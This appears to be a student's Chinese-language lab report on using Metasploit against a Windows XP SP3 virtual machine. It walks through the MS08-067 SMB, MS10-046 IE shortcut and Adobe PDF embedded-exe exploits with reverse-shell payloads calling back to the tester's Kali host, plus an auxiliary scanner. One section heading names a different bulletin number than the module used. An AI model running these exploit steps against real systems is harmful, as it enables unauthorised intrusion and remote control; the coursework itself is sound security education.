MS08_067漏洞渗透攻击(主动攻击)
这个实验使用winXPenSP3为靶机,并且只能用它当靶机。。。。并且确保两台虚拟机在同一网段。
1.打开终端,输入msfconsole
2.输入命令use exploit/windows/smb/ms08_067_netapi
,使用MS08_067
漏洞模块;
set payload generic/shell_reverse_tcp
指定攻击有效载荷; 4.设置具体参数:set LHOST Kali的IP set RHOST Windows的IP;
5.输入show options
查看所有参数是否设置正确
6.最后发起攻击输入exploit
MS11050安全漏洞(IE浏览器渗透攻击)
使用免考xp sp3
为靶机;
msfconsole
利用指令search ms10_046
找到可以攻击的模块 输入命令use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
使用 set payload windows/meterpreter/reverse_tcp
设置payload,并使用show options
查看参数:
最后下令发起攻击exploit
复制local IP
,在靶机上使用IE浏览器进行访问:
此时返回kali
使用 sessions -i 1 选择会话1,成功获取了靶机的shell,利用 systeminfo 指令查看靶机的系统信息:
对Adobe的漏洞攻击
输入search adobe
查询和adobe
漏洞有关的模块
exploit/windows/fileformat/adobe_pdf_embedded_exe
作为选择,然后show payloads
查看payload
: 输入命令use exploit/windows/fileformat/adobe_pdf_embedded_exe
选择windows/meterpreter/reverse_tcp
作为攻击载荷并输入命令 set windows/meterpreter/reverse_tcp
接着继续查看参数 输入set LHOST Kali的IP
,接着exploit
进行攻击 会生成一个pdf文件,我们需要找到它并将文件拷贝至windows XP下。 这个pdf文件是在隐藏文件夹中,所以我们需要在文件夹选项中选中查看隐藏文件。
输入命令进行监听回连
辅助模块的应用
输入命令show auxiliary
查看辅助模块
scanner/http/options
接着输入命令use scanner/http/options
之后输入info
查看信息 设置完参数后执行 基础问题回答
用自己的话解释什么是exploit,payload,encode:
exploit:攻击手段,是能使攻击武器(payload)的方法;
payload:攻击武器,真正具有攻击性的代码; encode:编码方式,根据payload将要被放置的环境选择合适的编码方式,使它能够正常的运行,如:消除所有的“0x00”;实验体会
这个实验让我知道了平时杀毒软件提示有高危漏洞,这些漏洞是如何被别人利用从而达到攻击你电脑的目的的,但是只能通过特定的漏洞攻击特定的电脑,不知道什么时候我们也能熟练利用各种漏洞攻击各种电脑。还有就是,做这个实验还是需要一个好的实验环境的。。。我的kali做到一半时突然不能联网了。。。重启大法也没有用,最后又莫名能连上了。。。